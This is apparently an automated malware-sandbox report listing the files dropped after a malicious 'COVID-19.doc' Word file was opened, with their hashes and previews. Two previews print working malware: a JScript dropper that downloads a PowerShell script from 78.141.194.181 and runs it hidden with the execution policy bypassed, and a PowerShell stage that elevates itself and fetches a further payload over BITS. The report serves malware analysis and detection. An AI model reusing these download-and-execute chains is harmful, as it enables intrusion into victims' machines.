                  C:\ProgramData\Microsoft\Network\Downloader\edb.log
                  Process:C:\Windows\System32\svchost.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24576
                  Entropy (8bit):1.2338110237198683
                  Encrypted:false
                  SSDEEP:96:+rTtiFq8ZhMOLUshNOn3TZh2XvOLUsCNOTjOkNf8Zm8ZEiv:ksogZ2ZdOOfjS
                  MD5:655E69432F4BB520E935E4AD133959CC
                  SHA1:B03CC64E540A54D9FDA8DA009397B73CB441F483
                  SHA-256:3B1739AE96A45596B7464F47DF41FC5BC13E037ED33F04D255C788320165519A
                  SHA-512:AD70586C5F928369B18F65A0EFFA204560658789B11E477A9E17DA499D80238DAF20349DFCB1F467DF23E707138257CD1B11267BF996420AE3320645B8975C05
                  Malicious:false
                  Preview: ......:{..(.....*....y!.............. ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................*....y!...........&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                  Process:C:\Windows\System32\svchost.exe
                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x0a413005, page size 16384, DirtyShutdown, Windows version 10.0
                  Category:dropped
                  Size (bytes):32768
                  Entropy (8bit):0.09583166594308014
                  Encrypted:false
                  SSDEEP:12:Ev0+9k1O4blIXg8KSv0+9k1O4blIXg8K:togLog
                  MD5:2147A4BA5A3B6D985B3DDFA5636859E1
                  SHA1:4D65B30E8251823BA994FFDBD0933E934BF3DF02
                  SHA-256:CF4219AFB18DE7BFFE5BB0D82F7539C225BE5F8C8DC30D63F1E25B582561240C
                  SHA-512:17465F558BE4271B3F3D79D4790BDC41A934B077656599AD35C0D4E21B9B1165F95C2EA123F1CD7DB9EF3245DC85D86AC68A298AFD89CBF21847A04D6E22D0E1
                  Malicious:false
                  Preview: .A0.... ................e.f.3...w........................&..........w..*....y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w......................................................................................................................................................................................................................................|\^.*....y..................F...*....y..........................................................................................................................................................................................................................................................................................................................................................................................
                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                  Process:C:\Windows\System32\svchost.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8192
                  Entropy (8bit):0.11187021931662426
                  Encrypted:false
                  SSDEEP:3:x/7EvPCTIl/bJdAtiiCT/oll:x/iCIt4jCTA
                  MD5:54D14AF16FB2CA5188B3B762BB7979B0
                  SHA1:49E8E55B2CCBC94AB6347DE7E8417B437D12F9B2
                  SHA-256:3C1C5676817ED4262A9670701E59E1C61BD11089A414673F96265008655E5B79
                  SHA-512:D67C5BAC609884C53EDE81983BFAB017B82A8EDAD2F57CCC808957270D0CEBD0481349ED5190DAE34D8E0093201EB66B27D6F1B428173156B2EDB76EB1C3CCAD
                  Malicious:false
                  Preview: `..5.....................................3...w..*....y.......w...............w.......w....:O.....w..................F...*....y..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{DB96EF63-FF50-4F07-B9F6-FD0B9439C462}.tmp
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):1024
                  Entropy (8bit):0.05390218305374581
                  Encrypted:false
                  SSDEEP:3:ol3lYdn:4Wn
                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                  Malicious:false
                  Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\d569872345345[1].txt
                  Process:C:\Windows\SysWOW64\wscript.exe
                  File Type:ASCII text
                  Category:downloaded
                  Size (bytes):1447
                  Entropy (8bit):5.2641765089103165
                  Encrypted:false
                  SSDEEP:24:B2hmZrhzxyzTsSN9WSEDhgFsf81iem3fPb2QGKJmEP8Lz6XGy6V:l/xAsfSEDhgFc2iemPPbJaEPQzhnV
                  MD5:9C0E8594784CC219239DF1906495C0F9
                  SHA1:CD83A127C63B595C1D0772AFCBBC361B18BDC65D
                  SHA-256:5374E582A5A0D2F1A28E9E93CE7D619C018DA3AAD1D3E232E30163232AF74B7E
                  SHA-512:D750385EEE0600314D00CF785F2C2734CFD857C9E3E66D681936301CBAF2F29A017165B0824A7C03BF28587874DB25FE99943D2DB568960DF29D80F98E13105A
                  Malicious:false
                  Yara Hits:
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\d569872345345[1].txt, Author: Florian Roth
                  IE Cache URL:http://78.141.194.181/d569872345345.txt
                  Preview: param([Int32]$adminRights = 0).if( $adminRights -eq 0 ).{..$args = '-ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File "' + $MyInvocation.InvocationName + '" -adminRights 1'..$runned = $false..while( -not $runned )..{...Try...{....Start-Process -FilePath "powershell.exe" -ArgumentList $args -WindowStyle Hidden -Verb RunAs....$runned = $true...}...Catch...{...}..}.} .else {. $OSArchitecture = (Get-WmiObject -Class Win32_OperatingSystem | Select-Object OSArchitecture -ErrorAction Stop).OSArchitecture. if ($OSArchitecture -Eq '64-bit') {. $ppshome = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0'. } else {. $ppshome = 'C:\Windows\System32\WindowsPowerShell\v1.0'. }.. $url = "http://78.141.194.181/s34987435987.txt".. $dstFile = [System.IO.Path]::GetRandomFileName() + '.ps1'. $file = $ppshome + '\' + $dstFile.. Import-Module BitsTransfer. Start-BitsTransfer -Source $url -Destination $file.. $service = 'sc
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):8309
                  Entropy (8bit):4.858741987165529
                  Encrypted:false
                  SSDEEP:192:Axoe5FVsm5emdgdVFn3eGOVpN6K3bkkjo5igkjDt4iWN3yBGHc9smUjdcU6CupOC:kEdVoGIpN6KQkj2Zkjh4iUxgpib4J
                  MD5:A1B380E20D97DC92053ADA0D7FF86B1B
                  SHA1:258A9B538055B68FEC01FBFA2B9C0B5C2EEA76F1
                  SHA-256:FA196A087B05DF4494E4551FC811EC4459572913EB92D5FC9FFDFAE3FF17E639
                  SHA-512:A43143DF1D6BF028B829404F8D567D5CB4E2A5A1F726CFDB5D89229D54E9A80781732C29987409894F603BDAE49FA733AF465B31A2B7B3FA8111B6EF506CA5DA
                  Malicious:false
                  Preview: PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):20824
                  Entropy (8bit):5.620475197980355
                  Encrypted:false
                  SSDEEP:384:AtPfXPwV9etYYZks0P02pR8nkSBRMnXHnccsjcGPqIPD2eI49xSa5jWgVym/xJo9:hYisU6k4RMX8VQGiii1WpiX+Jo9
                  MD5:A66B9C5EA955B7CEAE4B61D8CF649A8E
                  SHA1:B3AA6DD2E94DB27E2795BF136385178C82541D4F
                  SHA-256:6B4FBE053A7588BC716887563CF9E37221C6035920BECEE3DBCDE0D57C9A279D
                  SHA-512:B4D0381D096A23D48A59D7608220B09ECA891450544B66D173861AD68FF7D839AA5EC1A3F67EBAF5F99C21EEAA4A7F7C8F5C970921CEDEE75739D91172355E08
                  Malicious:false
                  Preview: @...e.......................K.9.*.....'..............@..........H...............<@.^.L."My...:H..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)M.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f....j.......System.Management...4....................].D.E.....#.......System.Data.<................):gK..G...$.1.q........System.ConfigurationH................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.P...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins
                  C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):170164
                  Entropy (8bit):4.36684997290107
                  Encrypted:false
                  SSDEEP:1536:fv0WZ5LzolWWpFpKKHAeedydju4HTbTuo+o5aQxJudUl9yhQL3oKmmy:fcqg8WpFpKKHHedydFeo+oQLUlPoK0
                  MD5:122A0A4C7C046C176AB6DB101AD18165
                  SHA1:F73D7FA4E1C6F2BA9BB7CCE176530C31BCAD1088
                  SHA-256:49D609F70DD72226B8A8C8DFA9FED95E29A0351F7FAE4915D0D8F0B011C92B86
                  SHA-512:E0E56500F38D6772DBD22E5947CDCF759037F9C51EC5F337DD4FE668B33BFC98C419A012D78940DAE004DC3476689C54CD7426559AD39DB28D3814567C1975C6
                  Malicious:false
                  Preview: MSFT................Q................................$......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8...8...9..l9...9..4:...:...:..`;...;..(<...<...<..T=...=...>...>...>..H?...?...@..t@...@..<A...A...B..hB.......l...B..........................$................................................ ...............................x...I..............T........................................... ...................................................
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2b2zdnjw.tgz.psm1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fhkzhmez.maj.psm1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmgpy3a4.cbw.ps1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pjrgunro.pw2.ps1
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Preview: 1
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\COVID-19.LNK
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:50 2020, mtime=Wed Jan 20 08:30:44 2021, atime=Wed Jan 20 08:30:41 2021, length=411136, window=hide
                  Category:dropped
                  Size (bytes):2090
                  Entropy (8bit):4.709359334679344
                  Encrypted:false
                  SSDEEP:24:8l2W/ahg/YE+BVAAbOnl+Dc7aB6myl2W/ahg/YE+BVAAbOnl+Dc7aB6m:8P/M+AlB6pP/M+AlB6
                  MD5:9A8424B72F27D539FE6889E93E0179B7
                  SHA1:96026EC03E024DAE3AE2AD2F17762CBC7E1CDDE6
                  SHA-256:58AD9FBDCB94F9FC615E650C5DD3A33205A4F340756505FCBD3F430FF787DF9D
                  SHA-512:2BE61A06A97016367BB1EDB1470E9A5761088AAC5417FC9F920162FABC0BAE9E2ED78EAF19999C32FF6296FA0221B08A8F874F0F248A9AC329BFAFF032F983A4
                  Malicious:false
                  Preview: L..................F.... ....;.R......q..............F...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..4R.K....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q{<..user.<.......N..4R.K....#J....................k...j.o.n.e.s.....~.1.....>Q|<..Desktop.h.......N..4R.K.....Y..............>......B..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..F..4R.K .COVID-19.doc..J......>Qz<4R.K.....V....................W...C.O.V.I.D.-.1.9...d.o.c.......R...............-.......Q...........>.S......C:\Users\user\Desktop\COVID-19.doc..#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.C.O.V.I.D.-.1.9...d.o.c.........:..,.LB.)...As...`.......X.......648351...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@.
                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):62
                  Entropy (8bit):4.344717181690711
                  Encrypted:false
                  SSDEEP:3:M1DxFu4o+oxFu4omX1DxFu4ov:M/jqjVjy
                  MD5:F63AF074E210140025C91FB35C1FBC43
                  SHA1:63341061EB572C4D72AA6486843692E86ABE62FD
                  SHA-256:E41B2FC6D51793A5613E73950232522FE1D8A7328E4D2A2E56333A1774668BD1
                  SHA-512:E2DC1D9A75D99CA803A29AD2460C9E8C9081F8B750DC31F885A7ECE6E8E38FA940022437799A6B38487A015901BC28E3897DC05106CAAB4B0902B0ECBC9DFAC3
                  Malicious:false
                  Preview: [doc]..COVID-19.LNK=0..COVID-19.LNK=0..[doc]..COVID-19.LNK=0..
                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):2.163644166813932
                  Encrypted:false
                  SSDEEP:3:Rl/Zdb+R2dt/9NiPD/t/9RCo1hln:RtZZ+R6tiPNCoR
                  MD5:E7A547F4EA7699D3A54DE5C681B1A054
                  SHA1:E1959753D1C4DBE965FD387229BAE4768BB9E347
                  SHA-256:47BACA51EB9EAB8514BAA8367E1C43B634FC324CC9741EA7E8F32096565BC8DB
                  SHA-512:B3FF14D583DEFBD09553F1633F878164F6F4F2F706710CF5F4913E8AA029AE21AF5258064FD809289C69F746AAD411D735242DC78706C368683D91C5FB511048
                  Malicious:false
                  Preview: .pratesh................................................p.r.a.t.e.s.h..........8.B............................<.2.............................0.................
                  C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:Little-endian UTF-16 Unicode text, with CR line terminators
                  Category:dropped
                  Size (bytes):22
                  Entropy (8bit):2.9808259362290785
                  Encrypted:false
                  SSDEEP:3:QAlX0Gn:QKn
                  MD5:7962B839183642D3CDC2F9CEBDBF85CE
                  SHA1:2BE8F6F309962ED367866F6E70668508BC814C2D
                  SHA-256:5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
                  SHA-512:2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
                  Malicious:false
                  Preview: ....p.r.a.t.e.s.h.....
                  C:\Users\user\Desktop\COVID-19.ps1
                  Process:C:\Windows\SysWOW64\wscript.exe
                  File Type:Little-endian UTF-16 Unicode text, with CR, LF line terminators
                  Category:dropped
                  Size (bytes):2900
                  Entropy (8bit):3.640765124039009
                  Encrypted:false
                  SSDEEP:48:hkM8lfpHyND/7rFucerCrdTAZVx2qJjuYllzT+FuidV9RiHBt92dA/HOu:OMypHuzxeuCZbrNuYllzT4uiX9RtS/H3
                  MD5:C8CFEDB371AFA966C9ED6B715D694BA3
                  SHA1:1ECFA6E23A05F3E90EFE009F6E4316F0EC487E73
                  SHA-256:4CE39D2AA80D4110D4042DA7A38A58D6BFA7E3F5D604E4DF8394604B4864BBE6
                  SHA-512:525145CE57E493071970FA5F8C4FEA845BE292EA214D2EC335987DB12AE969F8556D3709191FA8B1AD495337072654ABDB40A656EA0363790541E799053EE443
                  Malicious:true
                  Preview: ..p.a.r.a.m.(.[.I.n.t.3.2.].$.a.d.m.i.n.R.i.g.h.t.s. .=. .0.)...i.f.(. .$.a.d.m.i.n.R.i.g.h.t.s. .-.e.q. .0. .)...{.....$.a.r.g.s. .=. .'.-.E.x.e.c.u.t.i.o.n.P.o.l.i.c.y. .B.y.p.a.s.s. .-.N.o.L.o.g.o. .-.N.o.n.I.n.t.e.r.a.c.t.i.v.e. .-.N.o.P.r.o.f.i.l.e. .-.W.i.n.d.o.w.S.t.y.l.e. .H.i.d.d.e.n. .-.F.i.l.e. .".'. .+. .$.M.y.I.n.v.o.c.a.t.i.o.n...I.n.v.o.c.a.t.i.o.n.N.a.m.e. .+. .'.". .-.a.d.m.i.n.R.i.g.h.t.s. .1.'.....$.r.u.n.n.e.d. .=. .$.f.a.l.s.e.....w.h.i.l.e.(. .-.n.o.t. .$.r.u.n.n.e.d. .).....{.......T.r.y.......{.........S.t.a.r.t.-.P.r.o.c.e.s.s. .-.F.i.l.e.P.a.t.h. .".p.o.w.e.r.s.h.e.l.l...e.x.e.". .-.A.r.g.u.m.e.n.t.L.i.s.t. .$.a.r.g.s. .-.W.i.n.d.o.w.S.t.y.l.e. .H.i.d.d.e.n. .-.V.e.r.b. .R.u.n.A.s.........$.r.u.n.n.e.d. .=. .$.t.r.u.e.......}.......C.a.t.c.h.......{.......}.....}...}. ...e.l.s.e. .{... . . . .$.O.S.A.r.c.h.i.t.e.c.t.u.r.e. .=. .(.G.e.t.-.W.m.i.O.b.j.e.c.t. .-.C.l.a.s.s. .W.i.n.3.2._.O.p.e.r.a.t.i.n.g.S.y.s.t.e.m. .|. .S.e.l.e.c.t.-.O.b.j.e.c.t. . . . .O.S.A.r.
                  C:\Users\user\Desktop\COVID-19.tmp
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):554
                  Entropy (8bit):5.211432965029686
                  Encrypted:false
                  SSDEEP:12:eUvDzr8ie/B8dN1T02PWXO6qL1HdR5ehLUM17TA1QT8AdLOG9qrCNZ:eUz8iei9TXPFV5etxECNZ
                  MD5:60E18CC07D242AC01E5FAD4DA1ED807E
                  SHA1:EF94BD6B268B65AB69D06F48E4A2CA93F15D7064
                  SHA-256:6966E4044E6F9C236E47A7E74586B83C0E6DE0C9DA955B74342F5506B63A85C4
                  SHA-512:793C5F03E853D7C8BC9A6FA4C98353E57D9D30F8B1D34AF0BAA3A76BE33A720A07C2E55FC6722BCB63950AC677DA76CCE469193C70BCDB05C6969DECC4A2A2E6
                  Malicious:true
                  Preview: var o = WScript.CreateObject("MSXML2.XMLHTTP");..var ps = 'C:\\Users\\user\\Desktop\\COVID-19.ps1'..while (true) {.. o.Open('GET','http://78.141.194.181/d569872345345.txt',0);.. o.Send();.. if (o.Status==200) {.. var so = new ActiveXObject('Scripting.FileSystemObject');.. var fo = so.CreateTextFile(ps, true, true);.. fo.WriteLine(o.responseText);.. fo.Close();.. var c = 'powershell -ex bypass -win hid -f ' + ps;.. (new ActiveXObject("WScript.Shell")).Run(c, 0);.. WScript.Quit();.. }..}..
                  C:\Users\user\Desktop\~$VID-19.doc
                  Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):162
                  Entropy (8bit):2.3263314982102843
                  Encrypted:false
                  SSDEEP:3:Rl/Zdb+R2dt/9NiPD/t/9RCcFn:RtZZ+R6tiPNCcF
                  MD5:92949F7D3AD02CEF6406FEEA6907032B
                  SHA1:7CB09B75A019A8C6F2DB7BB8589389C7C234C317
                  SHA-256:40AB3ECE8C92A0D0D6C4845FCCDD17E33A3670D1B64606B46229CAB81962C1F5
                  SHA-512:5807747F670D2CE4FAAFB0A4DE76427848FF318DAAF6D0A07FD613DFE315B598F0B17EE6D4461860A603A4260B5C6266AEDA0010C02BE6D5125E7CB764D9D685
                  Malicious:false
                  Preview: .pratesh................................................p.r.a.t.e.s.h..........8.B............................<.2.............................0........j........
                  C:\Users\user\Documents\20210120\PowerShell_transcript.648351.BCz0DRM3.20210120103110.txt
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1393
                  Entropy (8bit):5.282987417959853
                  Encrypted:false
                  SSDEEP:24:BxSAOC7vBZFx2DOXUWEAOouW6HjeTKKjX4CIym1ZJX2zze62WX+DsV77PAGTbw32:BZRvjFoOkDq6qDYB1ZWze6NqsdU82ZZa
                  MD5:6866D6EE7B30ACF174EF1852E58A52F4
                  SHA1:1268DB2A4B7FDB3E4CEAADBAD8A2CAEF1D785793
                  SHA-256:EB00C7C901FE249A2829F373E5268FC67BC404C28518AF3567C2339145176AE0
                  SHA-512:07298AB4C3A5E533AF83AAD40ABC3D731B6A92C6850A4A72019E038B742E0FF5F924D956B790E8BA9D1F8BA883BCEE0110AD7E6809D71A9BF392BD675A36162A
                  Malicious:false
                  Yara Hits:
                  • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: C:\Users\user\Documents\20210120\PowerShell_transcript.648351.BCz0DRM3.20210120103110.txt, Author: Florian Roth
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210120103122..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 648351 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -File C:\Users\user\Desktop\COVID-19.ps1 -adminRights 1..Process ID: 5108..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210120103125..**********************..PS>CommandInvocation(COVID-19.ps1): "COVID-19.ps1"..>> ParameterBinding(COVID-19.ps1): name="adminRights"; value="1"..[SC] OpenService FAILED 1060:....The specified service does
                  C:\Users\user\Documents\20210120\PowerShell_transcript.648351.wAzWoynL.20210120103050.txt
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1076
                  Entropy (8bit):5.180808759433156
                  Encrypted:false
                  SSDEEP:24:BxSAOK7vBZFx2DOXUWGOBWGHjeTKKjX4CIym1ZJX2Yze62WM+NnxSAZ6s3C:BZVvjFoO1gGqDYB1ZVze6NMaZZV3C
                  MD5:1E80315542C114FCFEFE7FE8833E241E
                  SHA1:E536AAA3EC433F215547B73823826C775C71D2FE
                  SHA-256:9462FE15B79845A7EFE540A6CDC8AD4E0FFADDCFA47AF299CC3A700E90D1F2CF
                  SHA-512:E2791604DD66D8F498516CC856C41DFB928FADEFDDBEA48CDA7856B7113E61AA3FDA40514963D19ECFA9B7ED5CABB81530341E3A9E2EFA11DCF0AD5511AA4097
                  Malicious:false
                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210120103100..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 648351 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex bypass -win hid -f C:\Users\user\Desktop\COVID-19.ps1..Process ID: 2804..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210120103102..**********************..PS>CommandInvocation(COVID-19.ps1): "COVID-19.ps1"..>> ParameterBinding(COVID-19.ps1): name="adminRights"; value="0"..**********************..Command start time: 20210120103414..**********************..PS>$global:?..True..**********************..Windows P
                  C:\Windows\SysWOW64\20210120\PowerShell_transcript.648351.s_LwcT35.20210120103152.txt
                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1039
                  Entropy (8bit):5.162320619250201
                  Encrypted:false
                  SSDEEP:24:BxSAO6qPvNFx2DOXU4YfWAHjeTKKjX4CIym1ZJX2qYJRnxSAZ6mC:BZWvNFoOrAqDYB1ZDSZZnC
                  MD5:CA1B2EDF22BDBADE531793B7901294B0
                  SHA1:6DB3F1389DFDBAB6F97B1A28C72D58936B2F80AF
                  SHA-256:C06F2B700277B9D99C57D72480DE1FC534293FA10797C12DA911996EFD236569
                  SHA-512:8852E1814E8A49AE404E8BCEEEAB97FC64F78FB2EC1757AA627D2759CF32CB43D976B5BF95A018C4BE6574B973F786599CDFDB343468702682AB06BCC1FFF549
                  Malicious:false
